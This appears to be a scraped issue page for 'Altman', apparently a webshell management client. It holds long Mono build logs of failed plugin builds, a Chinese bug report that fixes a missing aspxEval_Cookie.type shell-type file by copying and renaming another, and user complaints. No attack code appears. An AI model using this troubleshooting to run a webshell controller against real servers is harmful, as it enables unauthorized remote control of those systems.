    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/server_connect.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.server_connect.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/server_disconnect.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.server_disconnect.ico'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_DbManager/Plugin_DbManager.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_DbManager/Plugin_DbManager.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.2050470

Building: Plugin_PluginManager (Release|x86)

Build started 1/14/2016 8:11:34 AM.


Project "/home/Altman/Source/Plugin_PluginManager/Plugin_PluginManager.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: x86
    Created directory "bin/x86/Release/"
    Created directory "obj/x86/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/x86/Release/
Considered '/home/Altman/Source/Plugin_PluginManager/bin/x86/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_PluginManager/bin/x86/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_PluginManager/bin/x86/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_PluginManager/bin/x86/Release/Eto.dll'
    Copying file from '/home/Altman/Libraries/Ionic.Zip/Ionic.Zip.Reduced.dll' to '/home/Altman/Source/Plugin_PluginManager/bin/x86/Release/Ionic.Zip.Reduced.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_PluginManager/Plugin_PluginManager.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_PluginManager/Plugin_PluginManager.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved

 1 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.3068470

Building: Plugin_ShellManager (Release)

Build started 1/14/2016 8:11:34 AM.


Project "/home/Altman/Source/Plugin_ShellManager/Plugin_ShellManager.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_ShellManager/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellManager/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellManager/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_ShellManager/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellManager/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellManager/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_ShellManager/bin/Release/Eto.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_ShellManager/Plugin_ShellManager.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_ShellManager/Plugin_ShellManager.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.3178790

Building: Plugin_IronPythonCollection (Release)

Build started 1/14/2016 8:11:35 AM.


Project "/home/Altman/Source/Plugin_IronPythonCollection/Plugin_IronPythonCollection.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_IronPythonCollection/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_IronPythonCollection/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_IronPythonCollection/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_IronPythonCollection/Plugin_IronPythonCollection.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_IronPythonCollection/Plugin_IronPythonCollection.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 1 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.1101000

Building: Test_DoNetPlugin (Release)

Build started 1/14/2016 8:11:35 AM.


Project "/home/Altman/Source/Test_DoNetPlugin/Test_DoNetPlugin.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Test_DoNetPlugin/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Test_DoNetPlugin/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Test_DoNetPlugin/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Test_DoNetPlugin/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Test_DoNetPlugin/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Test_DoNetPlugin/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Test_DoNetPlugin/bin/Release/Eto.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Test_DoNetPlugin/Test_DoNetPlugin.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Test_DoNetPlugin/Test_DoNetPlugin.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

Building: Test_IronPythonPlugin (Release)

Build started 1/14/2016 8:11:35 AM.


Project "/home/Altman/Source/Test_IronPythonPlugin/Test_IronPythonPlugin.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Test_IronPythonPlugin/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Test_IronPythonPlugin/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Test_IronPythonPlugin/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Test_IronPythonPlugin/Test_IronPythonPlugin.csproj".-- FAILED

Build FAILED.

Warnings:

Building: Plugin_DeveloperTool (Release)

Build started 1/14/2016 8:11:35 AM.


Project "/home/Altman/Source/Plugin_DeveloperTool/Plugin_DeveloperTool.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_DeveloperTool/bin/Release/Eto.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_DeveloperTool/Plugin_DeveloperTool.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_DeveloperTool/Plugin_DeveloperTool.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Building: Plugin_Encoder (Release)

Build started 1/14/2016 8:11:36 AM.


Project "/home/Altman/Source/Plugin_Encoder/Plugin_Encoder.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_Encoder/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_Encoder/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_Encoder/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_Encoder/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_Encoder/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_Encoder/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_Encoder/bin/Release/Eto.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_Encoder/Plugin_Encoder.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_Encoder/Plugin_Encoder.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

Building: Plugin_IPQuery (Release)

Build started 1/14/2016 8:11:36 AM.


Project "/home/Altman/Source/Plugin_IPQuery/Plugin_IPQuery.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_IPQuery/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_IPQuery/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_IPQuery/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_IPQuery/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_IPQuery/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_IPQuery/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_IPQuery/bin/Release/Eto.dll'
    Copying file from '/home/Altman/Source/packages/Newtonsoft.Json.6.0.6/lib/net40/Newtonsoft.Json.dll' to '/home/Altman/Source/Plugin_IPQuery/bin/Release/Newtonsoft.Json.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_IPQuery/Plugin_IPQuery.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_IPQuery/Plugin_IPQuery.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.1399220

Building: Altman.Gtk (Release|x86)

Build started 1/14/2016 8:11:36 AM.


Project "/home/Altman/Source/Altman.Gtk/Altman.Gtk.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: x86
    Created directory "obj/x86/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath ../../Build/
Considered '/home/Altman/Build/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Build/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Build/System.Data.DataSetExtensions.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Deployment' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Deployment, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Deployment, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Deployment' as a file, but the file does not exist
For searchpath ../../Build/
Considered '/home/Altman/Build/System.Deployment' as a file, but the file does not exist
Considered '/home/Altman/Build/System.Deployment.exe' as a file, but the file does not exist
Considered '/home/Altman/Build/System.Deployment.dll' as a file, but the file does not exist

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Altman.Gtk/Altman.Gtk.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Altman.Gtk/Altman.Gtk.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Deployment' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.2253650

---------------------- Done ----------------------

Build: 0 errors, 29 warnings

v3.0.0 release缺少aspxEval_Cookie.type导致"... hasn't been registered"错误

v3.0.0 release缺少aspxEval_Cookie.type导致"... hasn't been registered"错误

调试代码发现Altman.Webshell.InitWorker里的RegisterCustomShellType中段throw,导致后面所有func都没有注册,从而引发hasn't been registered错误。而引发throw的是aspxEval_Cookie这个type没找到,我在CustomType看了下确实没有这个aspxEval_Cookie.type这个文件,于是复制了一份aspEval_Cookie.type更名为aspxEval_Cookie.type,并将里面的name改了。重新运行程序,功能正常!
由于对aspx不熟悉,暂时也用不到aspx_cookie,也只能这样了,望官方尽快补上丢失的文件,谢谢!

MAC下略麻烦,有编译成功的没?

usage: cp [-R [-H | -L | -P]] [-fi | -n] [-apvX] source_file target_file
cp [-R [-H | -L | -P]] [-fi | -n] [-apvX] source_file ... target_directory
cp: directory ./Build/Altman.Mac.app/Contents/MonoBundle does not exist

altman建议

你好,
基础功能不够稳定,服务端代码兼容问题频发(都是亲身体验),实在不想单独一个个汇报。只想作者根据各种实际环境测试,牢靠版本出来后,再添加新的支持会更加好些。目前各种奇葩问题直让人吐槽,相信还有大部分人可能因为联系不方便没反馈出来,作者留个邮箱在介绍页吧。谢谢!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.